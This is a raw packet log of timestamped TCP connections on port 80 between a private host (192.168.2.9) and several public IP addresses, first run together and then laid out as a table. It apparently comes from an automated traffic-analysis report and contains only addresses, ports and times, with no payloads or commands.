                                                                                                                                                                                                              Oct 8, 2024 15:34:26.236241102 CEST6071580192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:26.241370916 CEST80607153.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.253767014 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.258780956 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.258896112 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.265856981 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:27.270946980 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.650372028 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.650906086 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.651114941 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.653213978 CEST6072880192.168.2.93.33.130.190
                                                                                                                                                                                                              Oct 8, 2024 15:34:28.658725977 CEST80607283.33.130.190192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.473763943 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.478828907 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.478902102 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.490788937 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.496001005 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.000173092 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.008111954 CEST8060775203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:36.008182049 CEST6077580192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.022981882 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.029571056 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.030164003 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.040915012 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:37.046407938 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444736958 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444752932 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444762945 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444808006 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444848061 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444858074 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444864035 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444875002 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.444890022 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445036888 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445055962 CEST8060788203.175.9.128192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:38.445092916 CEST6078880192.168.2.9203.175.9.128
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826988935 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827085972 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827126980 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827245951 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827416897 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827471018 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.832540035 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.832557917 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.832571983 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.832623959 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.931890011 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.931907892 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.931956053 CEST8060838199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.931982994 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.932013035 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:13.659024954 CEST6083880192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.675574064 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.681185961 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.681277990 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.689215899 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.695091009 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.288995981 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289017916 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289030075 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289057016 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289068937 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289079905 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289093018 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289103985 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289129019 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289283991 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289494038 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289736032 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.291085005 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.294135094 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.294151068 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.294163942 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.294271946 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.377408028 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.377446890 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.377840042 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.377882957 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.378144979 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.380539894 CEST6083980192.168.2.9199.192.19.19
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.385696888 CEST8060839199.192.19.19192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.743256092 CEST6084080192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.749845028 CEST8060840208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.749936104 CEST6084080192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.766876936 CEST6084080192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.774473906 CEST8060840208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:21.277307987 CEST8060840208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:21.277374983 CEST6084080192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:22.281724930 CEST6084080192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:22.286885977 CEST8060840208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.300478935 CEST6084180192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.306505919 CEST8060841208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.306586981 CEST6084180192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.320000887 CEST6084180192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.324879885 CEST8060841208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.848958969 CEST8060841208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:23.849036932 CEST6084180192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:24.839010000 CEST6084180192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:24.844398975 CEST8060841208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.847820044 CEST6084280192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.853174925 CEST8060842208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.853296995 CEST6084280192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.867177963 CEST6084280192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.873378992 CEST8060842208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:25.873658895 CEST8060842208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:26.368252993 CEST8060842208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:26.372437954 CEST6084280192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:27.379014015 CEST6084280192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:27.384109020 CEST8060842208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.398016930 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.403146029 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.403280020 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.410914898 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:28.416150093 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515738964 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515763044 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515779018 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515791893 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515803099 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515814066 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515825033 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515837908 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515917063 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.515961885 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.516009092 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.516020060 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.516062975 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.521941900 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.521960974 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.521974087 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.522095919 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624789953 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624854088 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624886036 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624905109 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624916077 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624949932 CEST8060843208.91.197.27192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:29.624953985 CEST6084380192.168.2.9208.91.197.27
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833632946 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833647966 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833668947 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833674908 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833689928 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833697081 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833734989 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.834307909 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.834357023 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:32.875370026 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.893872023 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.899036884 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.899189949 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.909727097 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.914827108 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378201962 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378263950 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378325939 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378357887 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378415108 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378459930 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378465891 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378513098 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378555059 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378559113 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378607035 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378647089 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378653049 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378703117 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378748894 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378997087 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.379062891 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:35.422138929 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.441040039 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.446815014 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.446923971 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.457803011 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.462882042 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.463901043 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958839893 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958864927 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958897114 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958915949 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958930016 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958949089 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958949089 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958982944 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958991051 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958998919 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959006071 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959029913 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959044933 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959076881 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959105968 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960849047 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960908890 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:37.981678009 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.988013983 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.993015051 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.993113995 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.000379086 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.005965948 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447664976 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447699070 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447715044 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447725058 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447745085 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447755098 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447772026 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447787046 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447798967 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447874069 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447890997 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448275089 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448286057 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448307991 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448319912 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448349953 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.452857018 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.458149910 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.593692064 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.598747969 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.598851919 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.609220028 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.614177942 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350007057 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350052118 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350125074 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:46.125463963 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.145809889 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.150901079 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.151238918 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.166169882 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.171329975 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.871860981 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.872256994 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.872320890 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:48.672323942 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.692178965 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.697278023 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.697376966 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.712145090 CEST6085880192.168.2.9195.161.68.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Oct 8, 2024 15:36:49.717428923 CEST | 80 | 60858 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:49.717453003 CEST | 80 | 60858 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:50.434241056 CEST | 80 | 60858 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:50.434354067 CEST | 80 | 60858 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:50.434708118 CEST | 60858 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:51.218998909 CEST | 60858 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:52.240621090 CEST | 60859 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:52.246011972 CEST | 80 | 60859 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:52.246088028 CEST | 60859 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:52.255220890 CEST | 60859 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:52.260195017 CEST | 80 | 60859 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:52.997530937 CEST | 80 | 60859 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:52.998603106 CEST | 80 | 60859 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:52.998866081 CEST | 60859 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:53.001317978 CEST | 60859 | 80 | 192.168.2.9 | 195.161.68.8
Oct 8, 2024 15:36:53.007069111 CEST | 80 | 60859 | 195.161.68.8 | 192.168.2.9
Oct 8, 2024 15:36:58.110794067 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:36:58.116377115 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.116460085 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:36:58.129393101 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:36:58.134357929 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822611094 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822639942 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822663069 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822674036 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822746992 CEST | 80 | 60860 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:36:58.822777033 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:36:58.828389883 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:36:59.640876055 CEST | 60860 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:00.659971952 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:00.664948940 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:00.665044069 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:00.675344944 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:00.680382013 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:01.358906031 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:01.358947039 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:01.358963013 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
Oct 8, 2024 15:37:01.358984947 CEST | 60861 | 80 | 192.168.2.9 | 194.58.112.174
Oct 8, 2024 15:37:01.359042883 CEST | 80 | 60861 | 194.58.112.174 | 192.168.2.9
